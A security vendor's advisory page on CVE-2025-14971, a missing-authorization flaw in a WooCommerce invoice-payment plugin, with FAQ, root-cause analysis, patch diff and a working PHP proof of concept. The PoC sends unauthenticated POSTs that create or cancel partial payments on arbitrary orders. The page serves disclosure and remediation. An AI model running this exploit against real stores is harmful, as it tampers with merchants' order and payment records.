What is CVE-2025-14971?

CVE-2025-14971 is a security vulnerability in the Link Invoice Payment for WooCommerce plugin for WordPress. It allows unauthenticated attackers to create or cancel partial payments on any WooCommerce order due to a missing authorization check in the plugin’s REST API.

How does the vulnerability work?

The vulnerability exists because the createPartialPayment and cancelPartialPayment functions lack permission callbacks. This allows attackers to send POST requests to the respective REST API endpoints without any authentication, enabling them to manipulate payment statuses.

Who is affected by this vulnerability?

Any WordPress site using the Link Invoice Payment for WooCommerce plugin version 2.8.0 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the Link Invoice Payment for WooCommerce plugin. If it is version 2.8.0 or earlier, your site is at risk. Additionally, you can review server logs for unauthorized POST requests to the affected REST API endpoints.

How can I fix this vulnerability?

To fix CVE-2025-14971, update the Link Invoice Payment for WooCommerce plugin to version 2.8.1 or later, where the issue has been patched. Regularly updating all plugins and themes is essential for maintaining site security.

What does the risk level of medium mean?

A medium risk level, with a CVSS score of 5.3, indicates that while the vulnerability is not critical, it can still lead to significant unauthorized actions, such as manipulating order payments. It is important to address medium-risk vulnerabilities promptly to prevent potential exploitation.

What are the practical implications of this vulnerability?

Successful exploitation of this vulnerability allows attackers to create fraudulent partial payments or cancel legitimate ones, disrupting payment workflows and potentially leading to financial disputes. Although it does not lead to direct theft of funds, it can harm the integrity of the order management system.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can send a crafted POST request to the vulnerable API endpoint to create a partial payment without authentication. This illustrates the ease with which the vulnerability can be exploited by anyone with knowledge of the API.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Link Invoice Payment for WooCommerce plugin until a patch can be applied. Additionally, review server logs for suspicious activity and monitor for unauthorized access attempts.

Are there any additional security measures I should implement?

In addition to updating vulnerable plugins, implement security measures such as using a web application firewall (WAF), regularly backing up your site, and conducting security audits. Educating users about secure practices can also help mitigate risks.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates on CVEs related to WordPress plugins and themes.

What resources are available for further assistance?

For further assistance, consider consulting the WordPress support forums, security-focused communities, or hiring a professional security service. Many resources are available online to help administrators understand and mitigate vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14971: Link Invoice Payment for WooCommerce <= 2.8.0 – Missing Authorization to Unauthenticated Arbitrary Partial Payment Creation/Cancellation (invoice-payment-for-woocommerce)

CVE ID CVE-2025-14971

Plugin invoice-payment-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.8.0

Patched Version 2.8.1

Disclosed January 25, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14971:
The Link Invoice Payment for WooCommerce plugin for WordPress contains a missing authorization vulnerability in its REST API endpoints. This allows unauthenticated attackers to create or cancel partial payments on arbitrary WooCommerce orders. The vulnerability affects all plugin versions up to and including 2.8.0, with a CVSS score of 5.3.

The root cause is the absence of permission callbacks in the REST route registrations for the create_partial_payment and cancel_partial_payment endpoints. In the vulnerable code in WcPaymentInvoiceEndpoint.php, the register_rest_route calls (lines 9-16) only define methods and callback parameters. The permission_callback parameter is completely missing, which means WordPress’s REST API does not perform any authorization checks before executing the createPartialPayment and cancelPartialPayment functions. This violates the principle of least privilege and allows any HTTP client to access these administrative functions.

Exploitation involves sending POST requests directly to the vulnerable REST endpoints. For creating partial payments, attackers would target /wp-json/invoice_payments/create_partial_payment with parameters including orderId and userId. For canceling payments, they would target /wp-json/invoice_payments/cancel_partial_payment with the partialOrderId parameter. Attackers can perform ID enumeration to discover valid order IDs and partial payment IDs. No authentication tokens, nonces, or session cookies are required in the vulnerable version.

The patch adds permission_callback functions to both REST route registrations. The checkCreatePartialPaymentPermission and checkCancelPartialPaymentPermission functions now validate multiple authorization factors. They verify WordPress nonces for CSRF protection, check if the current user has manage_woocommerce capability or owns the order, and implement additional session validation for unauthenticated users via the isRecentOrderOrValidSession method. The patch also adds nonce generation to the frontend JavaScript (WcPaymentInvoicePartial.php lines 23 and 98) and implements a cookie-based access token system for temporary unauthenticated access.

Successful exploitation allows attackers to manipulate the payment status of any WooCommerce order. They can create fraudulent partial payments that might trigger automated fulfillment processes or disrupt legitimate payment workflows. Attackers can also cancel existing partial payments, potentially causing financial disputes or order processing failures. While this does not directly lead to payment capture or fund transfer, it enables unauthorized modification of order financial data and can be used to harass store owners or customers.

Differential between vulnerable and patched code

Code Diff

--- a/invoice-payment-for-woocommerce/Includes/WcPaymentInvoiceEndpoint.php
+++ b/invoice-payment-for-woocommerce/Includes/WcPaymentInvoiceEndpoint.php
@@ -9,13 +9,165 @@
         register_rest_route('invoice_payments', '/create_partial_payment', array(
             'methods' => 'POST',
             'callback' => array($this, 'createPartialPayment'),
+            'permission_callback' => array($this, 'checkCreatePartialPaymentPermission'),
         ));
         register_rest_route('invoice_payments', '/cancel_partial_payment', array(
             'methods'  => 'POST',
             'callback' => array($this, 'cancelPartialPayment'),
+            'permission_callback' => array($this, 'checkCancelPartialPaymentPermission'),
         ));
     }

+    /**
+     * Verifica permissão para criar pagamento parcial
+     */
+    public function checkCreatePartialPaymentPermission($request) {
+        // Verificar nonce para proteção CSRF
+        $nonce = $request->get_header('X-WP-Nonce');
+        if (empty($nonce) || !wp_verify_nonce($nonce, 'wp_rest')) {
+            return new WP_Error('invalid_nonce', 'Nonce inválido', array('status' => 403));
+        }
+
+        $parameters = $request->get_params();
+        $order_id = isset($parameters['orderId']) ? $parameters['orderId'] : 0;
+        $user_id = isset($parameters['userId']) ? intval($parameters['userId']) : 0;
+
+        // Permitir criação de novo pedido
+        if ($order_id === 'newOrder') {
+            return true;
+        }
+
+        // Verificar se o pedido existe
+        if (!$order_id) {
+            return new WP_Error('invalid_order', 'ID do pedido é obrigatório', array('status' => 400));
+        }
+
+        $order = wc_get_order($order_id);
+        if (!$order) {
+            return new WP_Error('order_not_found', 'Pedido não encontrado', array('status' => 404));
+        }
+
+        $current_user_id = get_current_user_id();
+
+        // Se usuário está logado, verificar se é o dono do pedido ou admin
+        if ($current_user_id > 0) {
+            if (current_user_can('manage_woocommerce') || $current_user_id == $order->get_customer_id()) {
+                return true;
+            }
+            return new WP_Error('insufficient_permission', 'Você não tem permissão para criar pagamentos parciais para este pedido', array('status' => 403));
+        }
+
+        // Para usuários não logados, validações mais flexíveis
+        // Verificar se o user_id fornecido corresponde ao dono do pedido
+        if ($user_id != $order->get_customer_id()) {
+            return new WP_Error('user_mismatch', 'Usuário não corresponde ao dono do pedido', array('status' => 403));
+        }
+
+        // Validação adicional: verificar se é um pedido recente (últimas 24 horas) ou há uma sessão válida
+        if (!$this->isRecentOrderOrValidSession($order)) {
+            return new WP_Error('order_access_denied', 'Acesso negado: pedido muito antigo ou sessão inválida', array('status' => 403));
+        }
+
+        return true;
+    }
+
+    /**
+     * Verifica permissão para cancelar pagamento parcial
+     */
+    public function checkCancelPartialPaymentPermission($request) {
+        // Verificar nonce para proteção CSRF
+        $nonce = $request->get_header('X-WP-Nonce');
+        if (empty($nonce) || !wp_verify_nonce($nonce, 'wp_rest')) {
+            return new WP_Error('invalid_nonce', 'Nonce inválido', array('status' => 403));
+        }
+
+        $params = $request->get_params();
+        $partial_order_id = isset($params['partialOrderId']) ? intval($params['partialOrderId']) : 0;
+
+        if (!$partial_order_id) {
+            return new WP_Error('invalid_order_id', 'ID da ordem parcial é obrigatório', array('status' => 400));
+        }
+
+        $partial_order = wc_get_order($partial_order_id);
+        if (!$partial_order || $partial_order->get_meta('_wc_lkn_is_partial_order') !== 'yes') {
+            return new WP_Error('invalid_partial_order', 'Ordem parcial não encontrada ou inválida', array('status' => 404));
+        }
+
+        $current_user_id = get_current_user_id();
+
+        // Se usuário está logado, verificar se é o dono do pedido ou admin
+        if ($current_user_id > 0) {
+            if (current_user_can('manage_woocommerce') || $current_user_id == $partial_order->get_customer_id()) {
+                return true;
+            }
+            return new WP_Error('insufficient_permission', 'Você não tem permissão para cancelar este pagamento parcial', array('status' => 403));
+        }
+
+        // Para usuários não logados, validação mais flexível
+        // Verificar se é um pedido recente ou há sessão válida
+        if (!$this->isRecentOrderOrValidSession($partial_order)) {
+            return new WP_Error('access_denied', 'Acesso negado para cancelar este pagamento', array('status' => 403));
+        }
+
+        return true;
+    }
+
+    /**
+     * Valida se a sessão atual corresponde ao pedido
+     */
+    private function validateOrderSession($order_id, $user_id) {
+        // Para usuários não logados, verificar se existe um cookie/sessão válida
+        // que associe o usuário atual com o pedido
+
+        // Verificar se existe uma sessão WC válida
+        if (!WC()->session) {
+            return false;
+        }
+
+        // Verificar se o customer_id da sessão corresponde
+        $session_customer_id = WC()->session->get_customer_id();
+        if ($session_customer_id && $session_customer_id == $user_id) {
+            return true;
+        }
+
+        // Verificar se existe um cookie de ordem recente
+        $recent_orders = WC()->session->get('wc_recent_orders', array());
+        if (is_array($recent_orders) && in_array($order_id, $recent_orders)) {
+            return true;
+        }
+
+        // Para casos onde o usuário acabou de criar o pedido, permitir por um tempo limitado
+        // baseado em um cookie específico do plugin
+        $order_access_token = isset($_COOKIE['wc_invoice_payment_order_' . $order_id]) ? $_COOKIE['wc_invoice_payment_order_' . $order_id] : '';
+        if ($order_access_token) {
+            $expected_token = wp_hash($order_id . $user_id . 'wc_invoice_payment');
+            return hash_equals($expected_token, $order_access_token);
+        }
+
+        return false;
+    }
+
+    /**
+     * Verifica se é um pedido recente ou há uma sessão válida
+     */
+    private function isRecentOrderOrValidSession($order) {
+        // Verificar se o pedido é recente (últimas 24 horas)
+        $order_date = $order->get_date_created();
+        if ($order_date) {
+            $now = new DateTime();
+            $order_datetime = $order_date;
+            $diff = $now->diff($order_datetime);
+
+            // Se foi criado nas últimas 24 horas, permitir
+            if ($diff->days == 0) {
+                return true;
+            }
+        }
+
+        // Verificar se há uma sessão válida
+        return $this->validateOrderSession($order->get_id(), $order->get_customer_id());
+    }
+
     public function createPartialPayment($request) {
         $parameters = $request->get_params();

@@ -168,6 +320,9 @@
         $order->save();
         $partial_order->save();

+        // Definir cookie de acesso para usuários não logados
+        $this->setOrderAccessCookie($order_id, $user_id);
+

         return new WP_REST_Response([
             'success'       => true,
@@ -234,4 +389,21 @@
         ], 200);
     }

+    /**
+     * Define um cookie de acesso para validar sessões de usuários não logados
+     */
+    private function setOrderAccessCookie($order_id, $user_id) {
+        if (get_current_user_id() > 0) {
+            return; // Não precisa de cookie para usuários logados
+        }
+
+        $token = wp_hash($order_id . $user_id . 'wc_invoice_payment');
+        $cookie_name = 'wc_invoice_payment_order_' . $order_id;
+
+        // Cookie válido por 24 horas
+        $expire = time() + (24 * 60 * 60);
+
+        setcookie($cookie_name, $token, $expire, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
+    }
+
 }
--- a/invoice-payment-for-woocommerce/Includes/WcPaymentInvoicePartial.php
+++ b/invoice-payment-for-woocommerce/Includes/WcPaymentInvoicePartial.php
@@ -20,6 +20,7 @@
                 'partialPaymentTitle' => __('Partial Payment', 'wc-invoice-payment'),
                 'partialPaymentDescription' => __('Enter the amount you want to pay now, the rest can be paid later with other payment methods.', 'wc-invoice-payment'),
                 'payPartialText' => __('Pay Partial', 'wc-invoice-payment'),
+                'nonce' => wp_create_nonce('wp_rest'),
             ));
         }
     }
@@ -94,6 +95,8 @@
                 'totalToPay' => $totalToPay,
                 'confirmPayment' => __('Are you sure you want to pay %s?', 'wc-invoice-payment'),
                 'confirmCancel' => __('Are you sure you want to cancel this partial payment?', 'wc-invoice-payment'),
+                'nonce' => wp_create_nonce('wp_rest'),
+                'symbol' => get_woocommerce_currency_symbol( $order->get_currency() ),
             ));
         }
     }
--- a/invoice-payment-for-woocommerce/wc-invoice-payment.php
+++ b/invoice-payment-for-woocommerce/wc-invoice-payment.php
@@ -15,7 +15,7 @@
  * Plugin Name:       Invoice Payment for WooCommerce
  * Plugin URI:        https://www.linknacional.com/wordpress/plugins/
  * Description:       Invoice payment generation and management for WooCommerce.
- * Version:           2.8.0
+ * Version:           2.8.1
  * Author:            Link Nacional
  * Author URI:        https://www.linknacional.com/
  * Requires Plugins: woocommerce
@@ -41,7 +41,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define('WC_PAYMENT_INVOICE_VERSION', '2.8.0');
+define('WC_PAYMENT_INVOICE_VERSION', '2.8.1');
 define('WC_PAYMENT_INVOICE_TRANSLATION_PATH', plugin_dir_path(__FILE__) . 'languages/');
 define('WC_PAYMENT_INVOICE_ROOT_DIR', plugin_dir_path(__FILE__));
 define('WC_PAYMENT_INVOICE_ROOT_URL', plugin_dir_url(__FILE__));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14971 - Link Invoice Payment for WooCommerce <= 2.8.0 - Missing Authorization to Unauthenticated Arbitrary Partial Payment Creation/Cancellation
<?php

$target_url = 'https://vulnerable-wordpress-site.com';

// Function to create a partial payment on any order
function create_partial_payment($order_id, $user_id = 1, $amount = 10.00) {
    global $target_url;
    
    $endpoint = '/wp-json/invoice_payments/create_partial_payment';
    $url = $target_url . $endpoint;
    
    // Parameters required by the vulnerable createPartialPayment function
    $payload = [
        'orderId' => $order_id,
        'userId' => $user_id,
        'amount' => $amount,
        'paymentMethod' => 'bacs' // Bank transfer method
    ];
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Function to cancel an existing partial payment
function cancel_partial_payment($partial_order_id) {
    global $target_url;
    
    $endpoint = '/wp-json/invoice_payments/cancel_partial_payment';
    $url = $target_url . $endpoint;
    
    // Only partialOrderId is required for cancellation
    $payload = [
        'partialOrderId' => $partial_order_id
    ];
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Example usage
// Create partial payment on order ID 123
$result = create_partial_payment(123, 1, 50.00);
echo "Create Payment - HTTP Code: " . $result['code'] . "n";
echo "Response: " . $result['response'] . "nn";

// Cancel partial payment with ID 456
$result = cancel_partial_payment(456);
echo "Cancel Payment - HTTP Code: " . $result['code'] . "n";
echo "Response: " . $result['response'] . "n";

?>

Frequently Asked Questions

What is CVE-2025-14971?
Overview of the vulnerability
CVE-2025-14971 is a security vulnerability in the Link Invoice Payment for WooCommerce plugin for WordPress. It allows unauthenticated attackers to create or cancel partial payments on any WooCommerce order due to a missing authorization check in the plugin’s REST API.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists because the createPartialPayment and cancelPartialPayment functions lack permission callbacks. This allows attackers to send POST requests to the respective REST API endpoints without any authentication, enabling them to manipulate payment statuses.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Link Invoice Payment for WooCommerce plugin version 2.8.0 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the Link Invoice Payment for WooCommerce plugin. If it is version 2.8.0 or earlier, your site is at risk. Additionally, you can review server logs for unauthorized POST requests to the affected REST API endpoints.
How can I fix this vulnerability?
Recommended actions
To fix CVE-2025-14971, update the Link Invoice Payment for WooCommerce plugin to version 2.8.1 or later, where the issue has been patched. Regularly updating all plugins and themes is essential for maintaining site security.
What does the risk level of medium mean?
Understanding the severity
A medium risk level, with a CVSS score of 5.3, indicates that while the vulnerability is not critical, it can still lead to significant unauthorized actions, such as manipulating order payments. It is important to address medium-risk vulnerabilities promptly to prevent potential exploitation.
What are the practical implications of this vulnerability?
Potential consequences
Successful exploitation of this vulnerability allows attackers to create fraudulent partial payments or cancel legitimate ones, disrupting payment workflows and potentially leading to financial disputes. Although it does not lead to direct theft of funds, it can harm the integrity of the order management system.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an attacker can send a crafted POST request to the vulnerable API endpoint to create a partial payment without authentication. This illustrates the ease with which the vulnerability can be exploited by anyone with knowledge of the API.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the Link Invoice Payment for WooCommerce plugin until a patch can be applied. Additionally, review server logs for suspicious activity and monitor for unauthorized access attempts.
Are there any additional security measures I should implement?
Best practices for WordPress security
In addition to updating vulnerable plugins, implement security measures such as using a web application firewall (WAF), regularly backing up your site, and conducting security audits. Educating users about secure practices can also help mitigate risks.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates on CVEs related to WordPress plugins and themes.
What resources are available for further assistance?
Finding help and support
For further assistance, consider consulting the WordPress support forums, security-focused communities, or hiring a professional security service. Many resources are available online to help administrators understand and mitigate vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations